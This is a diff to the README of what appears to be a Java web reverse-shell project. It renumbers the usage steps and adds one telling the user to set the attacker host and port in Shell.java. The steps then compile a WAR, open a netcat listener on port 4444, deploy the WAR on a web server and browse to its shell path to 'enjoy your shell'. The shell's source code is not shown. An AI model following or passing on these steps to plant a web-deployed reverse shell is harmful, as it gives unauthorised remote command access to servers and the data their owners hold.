julien-desca/Java-Web-ReverseShell/README.md

 ## usage

-1.
+1. Go to src/main/java/com/manchabalais/reverse/java/Shell.java and change the 2 constants host & port
-`mvn clean install` to compile the war
+2. Compile the war with `mvn clean install`

-2. `nc -lvp 4444` for listening the connection
+3. `nc -lvp 4444` for listening the connection

-3. deploy on the web serveur & go to <deploy_path>/shell
+4. deploy on the web serveur & go to <deploy_path>/shell

-4. enjoy your shell
+5. enjoy your shell

 ## Notes